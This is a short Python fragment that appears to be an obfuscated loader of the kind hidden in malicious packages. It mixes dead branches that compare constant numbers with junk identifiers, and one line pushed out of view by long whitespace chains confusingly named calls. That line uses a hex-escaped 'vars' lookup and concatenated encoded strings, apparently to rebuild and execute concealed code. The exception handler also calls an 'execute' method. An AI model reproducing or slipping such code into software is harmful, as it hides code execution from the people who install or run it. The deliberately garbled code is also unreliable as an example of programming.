        if 448325 > 7354836:
            _floor(Invert = 43028 * 41588)._system(_absolute = -57591 + Walk._modulo)
        elif 449565 < 9323824:
            Walk._run(_negative = Walk._modulo * 12263)                                                                                                                                                                                                                                                          ;DDoDODoDOoooDDDOooO()(mnnnmnnnnnmnnnnnn(LJJJIIIIJJILIJLLJ(nmnmmmmnnmnmmmmmnmm(ODDOOoOODDDoDODDoOOoDOO('\x76\x61\x72\x73'))),_floor.Theory(System='S222S2S22S22SSSSS2SSS2S')+_floor.Theory(System='MMMNNMMNNNMMNNNNMM')))

    except Exception as _while:
        if 492923 > 9528732:
            _floor.execute(code = _positive(_while))

        elif 323791 > 9159502:
            _floor(Invert = -16759 - 64611)._run(_negative = Walk._modulo * -63004)
